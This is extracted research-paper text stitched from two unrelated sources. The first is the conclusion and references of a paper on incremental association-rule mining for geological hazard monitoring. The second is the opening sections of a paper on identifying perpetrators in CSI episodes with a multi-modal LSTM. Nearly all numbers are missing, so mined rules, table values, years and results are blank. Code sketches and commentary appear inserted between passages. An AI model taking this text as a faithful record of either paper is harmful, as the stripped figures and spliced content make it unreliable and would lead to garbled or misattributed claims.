ground water level rainfall soil moisture content ground deformation id l g h g l r h r l s h s s d b d ... ... ... ... ... ... ... ... ... according to the data of geological hazard monitoring system, the association rule mining is carried out and a series of rules are obtained. some rules are as follows: rule : if g = and r = and s = then d = rule : if g = and r = and s = then d = rule : if g = and r = and s = then d = rule : if g = and r = and s = then d = rule : if g = and r = and s = then d = rule : if g = and r = and s = then d = after analyzing the above rules, we can get:  in the case of high groundwater tables, heavy rainfall, and high soil moisture levels, large-scale deformation of the ground is promoted (according to rules and );  under conditions of heavy rainfall, the deformation of the ground may also be induced, even if the groundwater level and soil moisture are not high (according to rule );  when the groundwater level and soil moisture content is high, it is possible to promote the occurrence of ground deformation (according to rule );  when the groundwater level is low, the soil moisture content is low and the rainfall is very little, the ground will be deformed due to dryness (according to rule ). in summary, when the data of the local water table, rainfall, soil moisture content and ground deformation reach the value of the association rules, further analysis can be used as the warning threshold of landslide or ground fissure. v. conclusion in this paper, an algorithm of inverted index tree incremental updating association mining (iitree) is proposed. the algorithm is effectively implemented when the database is updated, without having to scan the original database. the new data will be inserted into the original b+ tree to get frequent item sets. 
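The quantitative-to-Boolean conversion used above (Table IV) can be pictured with a short sketch that splits each numeric monitoring attribute at its mean into a low and a high Boolean attribute, matching the low-value/high-value partition described earlier. The column names and readings below are invented for illustration.

```python
# Sketch of converting numeric monitoring attributes into Boolean
# low/high attributes before mining. Splitting at the mean follows the
# partition strategy in the text; column names and values are assumed.
def to_boolean_attributes(records, columns):
    """Split each numeric column at its mean into <col>_low / <col>_high."""
    means = {c: sum(r[c] for r in records) / len(records) for c in columns}
    boolean_rows = []
    for r in records:
        row = {}
        for c in columns:
            row[f"{c}_low"] = int(r[c] < means[c])
            row[f"{c}_high"] = int(r[c] >= means[c])
        boolean_rows.append(row)
    return boolean_rows

records = [
    {"groundwater": 3.1, "rainfall": 80.0, "soil_moisture": 0.22},
    {"groundwater": 1.2, "rainfall": 15.0, "soil_moisture": 0.10},
    {"groundwater": 2.8, "rainfall": 60.0, "soil_moisture": 0.19},
]
for row in to_boolean_attributes(records, ["groundwater", "rainfall", "soil_moisture"]):
    print(row)
```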
experiment results show that the iitree algorithm consumes less than / of the iuar algorithm when the number of transactions and the amount of new data are the same, which improves the efficiency of data processing. when the minimum support of iuar algorithm changes, iitree algorithm takes up less memory than iuar algorithm. the application of iitree algorithm to the data analysis of geological disaster monitoring system has some improvements in efficiency and memory usage and can be better applied to the early warning of the system. international conference on sensor network and computer engineering (icsnce ) references [ ] rakesh agrawal,tomasz imieliński,arun swami. mining association rules between sets of items in large databases[j]. acm sigmod record, , ( ). [ ] david w.cheung, jiawei han. maintenance of discovered association rules in large databases: an incremental updating technique. in proc of the twelfth international conference on data engineering, .usa: ieee, ( ): - . [ ] zhu yuquan, sun zhizhu, zhao chuan shen.quickly update frequent itemsets[j].computer research and development, ( ): - . [ ] david w l,cheung s,lee d,et al.a general incremental technique for maintaining discovered association rules[c].in proceedings of the fifth international conference on database systems for advanced applications,melbourne,australia, ( ): - . [ ] feng yucai, feng jianlin. incremental updating algorithm for association rules[j] .journal of software, , ( ): . [ ] william cheung, osmar r.zaiane. incremental mining of frequent patterns without candidate generation or support constraint .in proc of the seventh international conference on database engineering and applications symposium, . usa:ieee, ( ): - . [ ] gao feng, xie jianying.discover the incremental update algorithm of association rules[j].computer engineering, ( ): - + . [ ] li wen,hong qin,teng zhongjian,shi zhaoying. an inverted index based on b+ tree [j]. computer knowledge and technology, , ( ): . [ ] hu yanbo,zhong jun. based on clustering b + tree database index optimization algorithm [j]. computer applications, , ( ): . [ ] roh hongchan, kim woo-cheol, kim seungwoo, et, al. a b-tree index extension to enhance response time and the life cycle of flash memory[j]. information sciences, , : . [ ] wang yingqiang,shi yongsheng. application of b+ tree in database index[j]. journal of yangtze university, , ( ): . [ ] chen xiaojiang, huang zhang chan.numerical analysis[m].beijing: science press, : - . whodunnit? crime drama as a case for natural language understanding lea frermann shay b. cohen mirella lapata institute for language, cognition and computation school of informatics, university of edinburgh crichton street, edinburgh eh ab l.frermann@ed.ac.uk scohen@inf.ed.ac.uk mlap@inf.ed.ac.uk abstract in this paper we argue that crime drama ex- emplified in television programs such as csi: crime scene investigation is an ideal testbed for approximating real-world natural language understanding and the complex inferences as- sociated with it. we propose to treat crime drama as a new inference task, capitalizing on the fact that each episode poses the same ba- sic question (i.e., who committed the crime) and naturally provides the answer when the perpetrator is revealed. we develop a new dataset based on csi episodes, formalize per- petrator identification as a sequence labeling problem, and develop an lstm-based model which learns from multi-modal data. 
exper- imental results show that an incremental in- ference strategy is key to making accurate guesses as well as learning from representa- tions fusing textual, visual, and acoustic input. introduction the success of neural networks in a variety of ap- plications (sutskever et al., ; vinyals et al., ) and the creation of large-scale datasets have played a critical role in advancing machine under- standing of natural language on its own or together with other modalities. the problem has assumed several guises in the literature such as reading com- prehension (richardson et al., ; rajpurkar et al., ), recognizing textual entailment (bowman et al., ; rocktäschel et al., ), and notably question answering based on text (hermann et al., our dataset is available at https://github.com/ edinburghnlp/csi-corpus. ; weston et al., ), images (antol et al., ), or video (tapaswi et al., ). in order to make the problem tractable and amenable to computational modeling, existing ap- proaches study isolated aspects of natural language understanding. for example, it is assumed that un- derstanding is an offline process, models are ex- pected to digest large amounts of data before being able to answer a question, or make inferences. they are typically exposed to non-conversational texts or still images when focusing on the visual modality, ignoring the fact that understanding is situated in time and space and involves interactions between speakers. in this work we relax some of these sim- plifications by advocating a new task for natural lan- guage understanding which is multi-modal, exhibits spoken conversation, and is incremental, i.e., un- folds sequentially in time. specifically, we argue that crime drama exempli- fied in television programs such as csi: crime scene investigation can be used to approximate real-world natural language understanding and the complex in- ferences associated with it. csi revolves around a team of forensic investigators trained to solve crim- inal cases by scouring the crime scene, collecting irrefutable evidence, and finding the missing pieces that solve the mystery. each episode poses the same “whodunnit” question and naturally provides the an- swer when the perpetrator is revealed. speculation about the identity of the perpetrator is an integral part of watching csi and an incremental process: viewers revise their hypotheses based on new evi- dence gathered around the suspect/s or on new in- ferences which they make as the episode evolves. we formalize the task of identifying the perpetra- tor in a crime series as a sequence labeling problem. transactions of the association for computational linguistics, vol. , pp. – , . action editor: marco baroni. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. like humans watching an episode, we assume the model is presented with a sequence of inputs com- prising information from different modalities such as text, video, or audio (see section for details). the model predicts for each input whether the per- petrator is mentioned or not. our formulation gen- eralizes over episodes and crime series. it is not spe- cific to the identity and number of persons commit- ting the crime as well as the type of police drama under consideration. 
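A schematic of this sequence-labeling formulation is sketched below; the field names and the incremental model interface are hypothetical and only meant to make the input/output structure concrete.

```python
# Schematic of the sequence-labeling formulation: an episode is a
# sequence of (possibly multi-modal) inputs, one per screenplay
# sentence, each paired with a binary label. Field names are
# illustrative, not taken from the released corpus.
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class SentenceInput:
    text: str                       # spoken utterance or scene description
    frame_features: Optional[list]  # visual features for the aligned frame
    audio_features: Optional[list]  # acoustic features for the aligned span
    label: int                      # 1 = perpetrator mentioned, 0 = not

Episode = List[SentenceInput]

def incremental_predictions(episode: Episode, model):
    """Label each sentence using only the inputs seen so far."""
    history = []
    for step in episode:
        history.append(step)
        yield model.predict(history)  # hypothetical incremental model API
```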
advantageously, it is incre- mental, we can track model predictions from the beginning of the episode and examine its behavior, e.g., how often it changes its mind, whether it is con- sistent in its predictions, and when the perpetrator is identified. we develop a new dataset based on csi episodes which contains goldstandard perpetrator mentions as well as viewers’ guesses about the perpetrator while each episode unfolds. the se- quential nature of the inference task lends it- self naturally to recurrent network modeling. we adopt a generic architecture which combines a one-directional long-short term memory network (hochreiter and schmidhuber, ) with a softmax output layer over binary labels indicating whether the perpetrator is mentioned. based on this architec- ture, we investigate the following questions: . what type of knowledge is necessary for per- forming the perpetrator inference task? is the textual modality sufficient or do other modali- ties (i.e., visual and auditory input) also play a role? . what type of inference strategy is appropriate? in other words, does access to past information matter for making accurate inferences? . to what extent does model behavior simu- late humans? does performance improve over time and how much of an episode does the model need to process in order to make accu- rate guesses? experimental results on our new dataset reveal that multi-modal representations are essential for the task at hand boding well with real-world natural lan- guage understanding. we also show that an incre- mental inference strategy is key to guessing the per- petrator accurately although the model tends to be less consistent compared to humans. in the remain- der, we first discuss related work (section ), then present our dataset (section ) and formalize the modeling problem (section ). we describe our ex- periments in section . related work our research has connections to several lines of work in natural language processing, computer vi- sion, and more generally multi-modal learning. we review related literature in these areas below. language grounding recent years have seen in- creased interest in the problem of grounding lan- guage in the physical world. various semantic space models have been proposed which learn the meaning of words based on linguistic and visual or acous- tic input (bruni et al., ; silberer et al., ; lazaridou et al., ; kiela and bottou, ). a variety of cross-modal methods which fuse tech- niques from image and text processing have also been applied to the tasks of generating image de- scriptions and retrieving images given a natural lan- guage query (vinyals et al., ; xu et al., ; karpathy and fei-fei, ). another strand of re- search focuses on how to explicitly encode the un- derlying semantics of images making use of struc- tural representations (ortiz et al., ; elliott and keller, ; yatskar et al., ; johnson et al., ). our work shares the common goal of ground- ing language in additional modalities. our model is, however, not static, it learns representations which evolve over time. video understanding work on video understand- ing has assumed several guises such as generat- ing descriptions for video clips (venugopalan et al., a; venugopalan et al., b), retrieving video clips with natural language queries (lin et al., ), learning actions in video (bojanowski et al., ), and tracking characters (sivic et al., ). 
movies have also been aligned to screenplays (cour et al., ), plot synopses (tapaswi et al., ), and books (zhu et al., ) with the aim of improv- ing scene prediction and semantic browsing. other work uses low-level features (e.g., based on face de- tection) to establish social networks of main charac- ters in order to summarize movies or perform genre peter berglund: you're still going to have to convince a jury that i killed two strangers for no reason. grissom doesn't look worried. he takes his gloves off and puts them on the table. grissom: you ever been to the theater peter? there 's a play called six degrees of separation. it 's about how all the people in the world are connected to each other by no more than six people. all it takes to connect you to the victims is one degree. camera holds on peter berglund's worried look. figure : excerpt from a csi script (episode , season : “let the seller beware”). speakers are shown in bold, spoken dialog in normal font, and scene descriptions in italics. gold-standard entity mention annotations are in color. perpetrator mentions (e.g., peter berglund) are in green, while words referring to other entities are in red. classification (rasheed et al., ; sang and xu, ; dimitrova et al., ). although visual fea- tures are used mostly in isolation, in some cases they are combined with audio in order to perform video segmentation (boreczky and wilcox, ) or se- mantic movie indexing (naphide and huang, ). a few datasets have been released recently which include movies and textual data. movieqa (tapaswi et al., ) is a large-scale dataset which contains movies and , questions, each accompanied with five candidate answers, one of which is correct. for some movies, the dataset also contains subtitles, video clips, scripts, plots, and text from the described video service (dvs), a narration service for the visually impaired. moviedescription (rohrbach et al., ) is a re- lated dataset which contains sentences aligned to video clips from movies. scriptbase (gorinski and lapata, ) is another movie database which consists of movie screenplays (without video) and has been used to generate script summaries. in contrast to the story comprehension tasks en- visaged in movieqa and moviedescription, we fo- cus on a single cinematic genre (i.e., crime series), and have access to entire episodes (and their corre- sponding screenplays) as opposed to video-clips or dvss for some of the data. rather than answering multiple factoid questions, we aim to solve a single problem, albeit one that is inherently challenging to both humans and machines. question answering a variety of question an- swering tasks (and datasets) have risen in popularity in recent years. examples include reading compre- hension, i.e., reading text and answering questions about it (richardson et al., ; rajpurkar et al., ), open-domain question answering, i.e., find- ing the answer to a question from a large collection of documents (voorhees and tice, ; yang et al., ), and cloze question completion, i.e., predict- ing a blanked-out word of a sentence (hill et al., ; hermann et al., ). visual question an- swering (vqa; antol et al. ( )) is a another re- lated task where the aim is to provide a natural lan- guage answer to a question about an image. our inference task can be viewed as a form of question answering over multi-modal data, focus- ing on one type of question. 
compared to previous work on machine reading or visual question answer- ing, we are interested in the temporal characteristics of the inference process, and study how understand- ing evolves incrementally with the contribution of various modalities (text, audio, video). importantly, our formulation of the inference task as a sequence labeling problem departs from conventional ques- tion answering allowing us to study how humans and models alike make decisions over time. the csi dataset in this work, we make use of episodes of the u.s. tv show “crime scene investigation las vegas” (henceforth csi), one of the most successful crime series ever made. fifteen seasons with a total of episodes were produced over the course of fifteen years. csi is a procedural crime series, it follows a team of investigators employed by the las vegas police department as they collect and evaluate ev- episodes with one case episodes with two cases total number of cases min max avg pe r ca se sentences sentences with perpetrator scene descriptions spoken utterances characters type of crime murder accident suicide other table : statistics on the csi data set. the type of crime was identified by our annotators via a multiple-choice questionnaire (which included the option “other”). note that accidents may also involve perpetrators. idence to solve murders, combining forensic police work with the investigation of suspects. we paired official csi videos (from seasons – ) with screenplays which we downloaded from a web- site hosting tv show transcripts. our dataset com- prises csi episodes, each approximately min- utes long. episodes follow a regular plot, they begin with the display of a crime (typically without reveal- ing the perpetrator) or a crime scene. a team of five recurring police investigators attempt to reconstruct the crime and find the perpetrator. during the inves- tigation, multiple (innocent) suspects emerge, while the crime is often committed by a single person, who is eventually identified and convicted. some csi episodes may feature two or more unrelated cases. at the beginning of the episode the csi team is split and each investigator is assigned a single case. the episode then alternates between scenes cover- ing each case, and the stories typically do not over- lap. figure displays a small excerpt from a csi screenplay. readers unfamiliar with script writing conventions should note that scripts typically consist of scenes, which have headings indicating where the scene is shot (e.g., inside someone’s house). char- acter cues preface the lines the actors speak (see boldface in figure ), and scene descriptions explain what the camera sees (see second and fifth panel in figure ). screenplays were further synchronized with the http://transcripts.foreverdreaming.org/ video using closed captions which are time-stamped and provided in the form of subtitles as part of the video data. the alignment between screenplay and closed captions is non-trivial, since the latter only contain dialogue, omitting speaker information or scene descriptions. we first used dynamic time warping (dtw; myers and rabiner ( )) to ap- proximately align closed captions with the dialogue in the scripts. and then heuristically time-stamped remaining elements of the screenplay (e.g., scene descriptions), allocating them to time spans between spoken utterances. 
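As a rough illustration of the alignment step, the following is a generic dynamic time warping over a token-overlap cost between captions and script dialogue; it is not the authors' exact pipeline, and the cost function is an assumption.

```python
# Generic DTW between time-stamped captions and screenplay dialogue,
# using one minus token Jaccard overlap as the local cost.
def token_cost(a, b):
    ta, tb = set(a.lower().split()), set(b.lower().split())
    return 1.0 - len(ta & tb) / max(len(ta | tb), 1)

def dtw_align(captions, script_lines):
    n, m = len(captions), len(script_lines)
    INF = float("inf")
    d = [[INF] * (m + 1) for _ in range(n + 1)]
    d[0][0] = 0.0
    back = {}
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            c = token_cost(captions[i - 1], script_lines[j - 1])
            best = min((d[i - 1][j - 1], (i - 1, j - 1)),
                       (d[i - 1][j], (i - 1, j)),
                       (d[i][j - 1], (i, j - 1)))
            d[i][j] = c + best[0]
            back[(i, j)] = best[1]
    # Trace back the warping path as (caption index, script index) pairs.
    path, cell = [], (n, m)
    while cell != (0, 0):
        path.append((cell[0] - 1, cell[1] - 1))
        cell = back.get(cell, (0, 0))
    return list(reversed(path))

captions = ["you ever been to the theater peter", "all it takes is one degree"]
script = ["you ever been to the theater peter?",
          "there's a play called six degrees of separation.",
          "all it takes to connect you to the victims is one degree."]
print(dtw_align(captions, script))
```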
table shows some descrip- tive statistics on our dataset, featuring the number of cases per episode, its length (in terms of number of sentences), the type of crime, among other infor- mation. the data was further annotated, with two goals in mind. firstly, in order to capture the character- istics of the human inference process, we recorded how participants incrementally update their beliefs about the perpetrator. secondly, we collected gold- standard labels indicating whether the perpetrator is mentioned. specifically, while a participant watches an episode, we record their guesses about who the perpetrator is (section . ). once the episode is fin- ished and the perpetrator is revealed, the same par- ticipant annotates entities in the screenplay referring to the true perpetrator (section . ). . eliciting behavioral data all annotations were collected through a web- interface. we recruited three annotators, all post- graduate students and proficient in english, none of them regular csi viewers. we obtained annotations for episodes (comprising cases). a snapshot of the annotation interface is pre- sented in figure . the top of the interface provides a short description of the episode, i.e., in the form of a one-sentence summary (carefully designed to not give away any clues about the perpetrator). sum- maries were adapted from the csi season summaries available in wikipedia. the annotator watches the episode (i.e., the video without closed captions) as a sequence of three minute intervals. every three minutes, the video halts, and the annotator is pre- see e.g., https://en.wikipedia.org/wiki/ csi:_crime_scene_investigation_(season_ ). number of cases: case : grissom, catherine, nick and warrick investigate when a wealthy couple is murdered at their house. case : meanwhile sara is sent to a local high school where a cheerleader was found eviscerated on the football field. screenplay perpetrator mentioned? relates to case / /none? (nick cuts the canopy around monica newman.) nick okay, warrick, hit it (warrick starts the crane support under the awning to re- move the body and the canopy area that nick cut.) nick white female, multiple bruising . . . bullet hole to the temple doesn’t help nick . auto on the side warrick yeah, somebody man- handled her pretty good before they killed her figure : annotation interface (first pass): after watch- ing three minutes of the episode, the annotator indicates whether she believes the perpetrator has been mentioned. sented with the screenplay corresponding to the part of the episode they have just watched. while read- ing through the screenplay, they must indicate for every sentence whether they believe the perpetrator is mentioned. this way, we are able to monitor how humans create and discard hypotheses about perpe- trators incrementally. as mentioned earlier, some episodes may feature more than one case. annota- tors signal for each sentence, which case it belongs to or whether it is irrelevant (see the radio buttons in figure ). in order to obtain a more fine-grained picture of the human guesses, annotators are addi- tionally asked to press a large red button (below the video screen) as soon as they “think they know who the perpetrator is”, i.e., at any time while they are ( it ’s a shell casing . ) perpetrator suspect other grissom moves his light to the canopy below perpetrator suspect other figure : annotation interface (second pass): after watching the episode, the annotator indicates for each word whether it refers to the perpetrator. 
watching the video. they are allowed to press the button multiple times throughout the episode in case they change their mind. even though the annotation task just described reflects individual rather than gold-standard behav- ior, we report inter-annotator agreement (iaa) as a means of estimating variance amongst partici- pants. we computed iaa using cohen’s ( ) kappa based on three episodes annotated by two participants. overall agreement on this task (sec- ond column in figure ) is . . we also measured percent agreement on the minority class (i.e., sen- tences tagged as “perpetrator mentioned”) and found it to be reasonably good at . , indicating that de- spite individual differences, the process of guessing the perpetrator is broadly comparable across partic- ipants. finally, annotators had no trouble distin- guishing which utterances refer to which case (when the episode revolves around several), achieving an iaa of κ = . . . gold standard mention annotation after watching the entire episode, the annotator reads through the screenplay for a second time, and tags entity mentions, now knowing the perpetrator. each word in the script has three radio buttons at- tached to it, and the annotator selects one only if a word refers to a perpetrator, a suspect, or a character who falls into neither of these classes (e.g., a po- lice investigator or a victim). for the majority of words, no button will be selected. a snapshot of our interface for this second layer of annotations is shown in figure . to ensure consistency, annota- tors were given detailed guidelines about what con- stitutes an entity. examples include proper names and their titles (e.g., mr collins, sgt. o’ reilly), pronouns (e.g., he, we ), and other referring expres- sions including nominal mentions (e.g., let’s arrest the guy with the black hat ). inter-annotator agreement based on three episodes and two annotators was κ = . on the perpetrator class and κ = . on other en- tity annotations (grouping together suspects with other entities). percent agreement was . for perpetrators and . for other entities. the high agreement indicates that the task is well-defined and the elicited annotations reliable. after the second pass, various entities in the script are disambiguated in terms of whether they refer to the perpetrator or other individuals. note that in this work we do not use the token- level gold standard annotations directly. our model is trained on sentence-level annotations which we obtain from token-level annotations, under the as- sumption that a sentence mentions the perpetrator if it contains a token that does. model description we formalize the problem of identifying the perpe- trator in a crime series episode as a sequence label- ing task. like humans watching an episode, our model is presented with a sequence of (possibly multi-modal) inputs, each corresponding to a sen- tence in the script, and assigns a label l indicating whether the perpetrator is mentioned in the sentence (l = ) or not (l = ). the model is fully incremen- tal, each labeling decision is based solely on infor- mation derived from previously seen inputs. we could have formalized our inference task as a multi-label classification problem where labels cor- respond to characters in the script. although per- haps more intuitive, the multi-class framework re- sults in an output label space different for each episode which renders comparison of model perfor- mance across episodes problematic. 
In contrast, our formulation has the advantage of being directly applicable to any episode or indeed any crime series. A sketch of our inference task is shown in Figure. Figure: overview of the perpetrator prediction task; the model receives input in the form of text, images, and audio, each modality is mapped to a feature representation, and the fused representations are passed to an LSTM which predicts whether a perpetrator is mentioned or not. Figure: illustration of the input/output structure of our LSTM model for two time steps. The core of our model is a one-directional long short-term memory network (LSTM; Hochreiter and Schmidhuber; Zaremba et al.). LSTM cells are a variant of recurrent neural networks with a more complex computational unit which have emerged as a popular architecture due to their representational power and effectiveness at capturing long-term dependencies. LSTMs provide ways to selectively store and forget aspects of previously seen inputs, and as a consequence can memorize information over longer time periods. Through input, output, and forget gates, they can flexibly regulate the extent to which inputs are stored, used, and forgotten. The LSTM processes a sequence of (possibly multi-modal) inputs s = {x_h^1, x_h^2, ..., x_h^n}. It utilizes a memory slot c_t and a hidden state h_t which are incrementally updated at each time step t. Given input x_t, the previous latent state h_{t-1}, and the previous memory state c_{t-1}, the latent state h_t for time t and the updated memory state c_t are computed as follows:

\begin{pmatrix} i_t \\ f_t \\ o_t \\ \hat{c}_t \end{pmatrix} = \begin{pmatrix} \sigma \\ \sigma \\ \sigma \\ \tanh \end{pmatrix} W \begin{bmatrix} h_{t-1} \\ x_t \end{bmatrix}, \qquad c_t = f_t \odot c_{t-1} + i_t \odot \hat{c}_t, \qquad h_t = o_t \odot \tanh(c_t).

The weight matrix W is estimated during inference, i, o, and f are memory gates, and \odot denotes element-wise multiplication. As mentioned earlier, the input to our model consists of a sequence of sentences, either spoken utterances or scene descriptions (we do not use speaker information). We further augment textual input with multi-modal information obtained from the alignment of screenplays to video (see Section ). Textual modality: words in each sentence are mapped to pre-trained GloVe embeddings trained on Wikipedia and Gigaword (Pennington et al.). Word embeddings are subsequently concatenated and padded to the maximum sentence length observed in our data set in order to obtain fixed-length input vectors. The resulting vector is passed through a convolutional layer with max-pooling to obtain a sentence-level representation x_s. Word embeddings are fine-tuned during training. Visual modality: we obtain the video corresponding to the time span covered by each sentence and sample one frame per sentence from the center of the associated period (we also experimented with multiple frames per sentence but did not observe any improvement in performance). We then map each frame to a visual feature vector x_v using the final hidden layer of a pre-trained convolutional network which was optimized for object classification (Inception; Szegedy et al.). Acoustic modality: for each sentence, we extract the audio track from the video, which includes all sounds and background music but no spoken dialog. We then obtain mel-frequency cepstral coefficient (MFCC) features from the continuous signal. MFCC features were originally developed in the context of speech recognition (Davis and Mermelstein; Sahidullah and Saha), but have also been shown to work well for more general sound classification (Chachada and Kuo).
we extract a -dimensional mfcc feature vector for every five milliseconds in the video. for each input sentence, we sample five mfcc feature vec- tors from its associated time interval, and concate- nate them in chronological order into the acoustic input xa. modality fusion our model learns to fuse multi- modal input as part of its overall architecture. we use a general method to obtain any combination of input modalities (i.e., not necessarily all three). single modality inputs are concatenated into an m-dimensional vector (where m is the sum of di- mensionalities of all the input modalities). we then multiply this vector with a weight matrix wh of di- mension m×n, add an m-dimensional bias bh, and pass the result through a rectified linear unit (relu): xh = relu([xs;xv;xa]wh + bh) the resulting multi-modal representation xh is of di- mension n and passed to the lstm (see figure ). evaluation in our experiments we investigate what type of knowledge and strategy are necessary for identify- ing the perpetrator in a csi episode. in order to shed light on the former question we compare variants of our model with access to information from different modalities. we examine different inference strate- gies by comparing the lstm to three baselines. the first one lacks the ability to flexibly fuse multi-modal information (a crf), while the second one does not have a notion of history, classifying inputs indepen- dently (a multilayer perceptron). our third baseline is a rule-base system that neither uses multi-modal inputs nor has a notion of history. we also compare the lstm to humans watching csi. before we re- port our results, we describe our setup and compari- son models in more detail. . experimental settings our csi data consists of episodes giving rise to cases (see table ). the model was trained on preliminary experiments showed that concatenation out- performs averaging or relying on a single feature vector. cases using cross-validation (five splits with / training/test cases). the remaining cases were used as truly held-out test data for final evaluation. we trained our model using adam with stochastic gradient-descent and mini-batches of six episodes. weights were initialized randomly, except for word embeddings which were initialized with pre-trained -dimensional glove vectors (penning- ton et al., ), and fine-tuned during training. we trained our networks for epochs and report the best result obtained during training. all results are averages of five runs of the network. parameters were optimized using two cross-validation splits. the sentence convolution layer has three filters of sizes , , each of which after convolution returns -dimensional output. the final sentence represen- tation xs is obtained by concatenating the output of the three filters and is of dimension . we set the size of the hidden representation of merged cross- modal inputs xh to . the lstm has one layer with nodes. we set the learning rate to . and apply dropout with probability of . . we compared model output against the gold stan- dard of perpetrator mentions which we collected as part of our annotation effort (second pass). . model comparison crf conditional random fields (lafferty et al., ) are probabilistic graphical models for se- quence labeling. the comparison allows us to exam- ine whether the lstm’s use of long-term memory and (non-linear) feature integration is beneficial for sequence prediction. 
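For concreteness, the fusion-plus-LSTM tagger described above can be sketched as follows. Layer sizes and feature dimensions are placeholders (the exact values are elided in this copy), and the code is an illustration rather than the authors' released implementation.

```python
# Compact sketch of the fused-input tagger: per-sentence text/visual/audio
# vectors are concatenated, projected with a ReLU, fed to a one-directional
# LSTM, and mapped to a binary label per step. All dimensions are assumed.
import torch
import torch.nn as nn

class PerpetratorTagger(nn.Module):
    def __init__(self, text_dim=300, vis_dim=1000, aud_dim=65,
                 fused_dim=128, hidden_dim=128):
        super().__init__()
        self.fuse = nn.Sequential(
            nn.Linear(text_dim + vis_dim + aud_dim, fused_dim), nn.ReLU())
        self.lstm = nn.LSTM(fused_dim, hidden_dim, batch_first=True)
        self.out = nn.Linear(hidden_dim, 2)   # mentioned vs. not mentioned

    def forward(self, x_s, x_v, x_a):
        # x_*: (batch, sequence_length, modality_dim), one step per sentence
        x_h = self.fuse(torch.cat([x_s, x_v, x_a], dim=-1))
        h, _ = self.lstm(x_h)                 # left-to-right only
        return self.out(h)                    # (batch, seq_len, 2) logits

# Toy forward pass on random features for a 10-sentence "episode".
model = PerpetratorTagger()
logits = model(torch.randn(1, 10, 300), torch.randn(1, 10, 1000),
               torch.randn(1, 10, 65))
print(logits.shape)   # torch.Size([1, 10, 2])
```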
we experimented with a vari- ety of features for the crf, and obtained best results when the input sentence is represented by concate- nated word embeddings. mlp we also compared the lstm against a multi-layer perceptron with two hidden layers, and a softmax output layer. we replaced the lstm in our overall network structure with the mlp, keeping the methodology for sentence convolution and modal- ity fusion and all associated parameters fixed to the values described in section . . the hidden layers of the mlp have relu activations and a layer-size of , as in the lstm. we set the learning rate to . . the mlp makes independent predictions for each element in the sequence. this comparison model modality cross-val held-out t v a pr re f pr re f pro + – – . . . . . . crf + – – . . . . . . mlp + – – . . . . . . + + – . . . . . . + – + . . . . . . + + + . . . . . . lstm + – – . . . . . . + + – . . . . . . + – + . . . . . . + + + . . . . . . humans . . . . . . table : precision (pr) recall (re) and f for detecting the minority class (perpetrator mentioned) for humans (bot- tom) and various systems. we report results with cross- validation (center) and on a held-out data set (right) using the textual (t) visual (v), and auditory (a) modalities. sheds light on the importance of sequential informa- tion for the perpetrator identification task. all re- sults are best checkpoints over training epochs, averaged over five runs. pro aside from the supervised models described so far, we developed a simple rule-based system which does not require access to labeled data. the system defaults to the perpetrator class for any sen- tence containing a personal (e.g., you ), possessive (e.g., mine ) or reflexive pronoun (e.g., ourselves ). in other words, it assumes that every pronoun refers to the perpetrator. pronoun mentions were identi- fied using string-matching and a precompiled list of pronouns. this system cannot incorporate any acoustic or visual data. human upper bound finally, we compared model performance against humans. in our anno- tation task (section . ), participants annotate sen- tences incrementally, while watching an episode for the first time. the annotations express their belief as to whether the perpetrator is mentioned. we evalu- ate these first-pass guesses against the gold standard (obtained in the second-pass annotation). . . . . p re c is io n i n f in a l % o f th e e p is o d e test episode id lstm human lstm avg human avg figure : precision in the final % of an episode, for test episodes from five cross-validation splits. we show scores per episode and global averages (horizontal bars). episodes are ordered by increasing model precision. . which model is the best detective? we report precision, recall and f on the minority class, focusing on how accurately the models iden- tify perpetrator mentions. table summarizes our results, averaged across five cross-validation splits (left) and on the truly held-out test episodes (right). overall, we observe that humans outperform all comparison models. in particular, human precision is superior, whereas recall is comparable, with the exception of pro which has high recall (at the ex- pense of precision) since it assumes that all pro- nouns refer to perpetrators. we analyze the differ- ences between model and human behavior in more detail in section . . with regard to the lstm, both visual and acoustic modalities bring improvements over the textual modality, however, their contribu- tion appears to be complementary. 
we also exper- imented with acoustic and visual features on their own, but without high-level textual information, the lstm converges towards predicting the majority class only. results on the held-out test set reveal that our model generalizes well to unseen episodes, de- spite being trained on a relatively small data sample compared to standards in deep learning. the lstm consistently outperforms the non- incremental mlp. this shows that the ability to uti- lize information from previous inputs is essential for this task. this is intuitively plausible; in order to identify the perpetrator, viewers must be aware of the plot’s development and make inferences while the episode evolves. the crf is outperformed by all other systems, including rule-based pro. in con- trast to the mlp and pro, the crf utilizes sequen- tial information, but cannot flexibly fuse informa- tion from different modalities or exploit non-linear mappings like neural models. the only type of input which enabled the crf to predict perpetra- tor mentions were concatenated word embeddings (see table ). we trained crfs on audio or visual features, together with word embeddings, however these models converged to only predicting the ma- jority class. this suggests that crfs do not have the capacity to model long complex sequences and draw meaningful inferences based on them. pro achieves a reasonable f score but does so because it achieves high recall at the expense of very low precision. the precision-recall tradeoff is much more balanced for the neural systems. . can the model identify the perpetrator? in this section we assess more directly how the lstm compares against humans when asked to identify the perpetrator by the end of a csi episode. specifically, we measure precision in the final % of an episode, and compare human performance (first-pass guesses) and an lstm model which uses all three modalities. figure shows precision results for test episodes (across five cross-validation splits) and average precision as horizontal bars. perhaps unsurprisingly, human performance is su- perior; however, the model achieves an average pre- cision of % which is encouraging (compared to episode (season ): “got murder?” episode (season ): “a night at the movies” . . . . sc o re lstm f human f c o u n t lstm tp human tp gold tp c o u n t #sentences observed lstm tp human tp gold tp . . . . sc o re lstm f human f c o u n t lstm tp human tp gold tp c o u n t #sentences observed lstm tp human tp gold tp figure : human and lstm behavior over the course of two episodes (left and right). top plots show cumulative f ; true positives (tp) are shown cumulatively (center) and as individual counts for each interval (bottom). statistics relating to gold perpetrator mentions are shown in black. red vertical bars show when humans press the red button to indicate that they (think they) have identified the perpetrator. % achieved by humans). our results also show a moderate correlation between the model and hu- mans: episodes which are difficult for the lstm (see left side of the plot in figure ) also result in lower human precision. two episodes on the very left of the plot have % precision and are special cases. the first one revolves around a suicide, which is not strictly speaking a crime, while the second one does not mention the perpetrator in the final %. . how is the model guessing? we next analyze how the model’s guessing abil- ity compares to humans. 
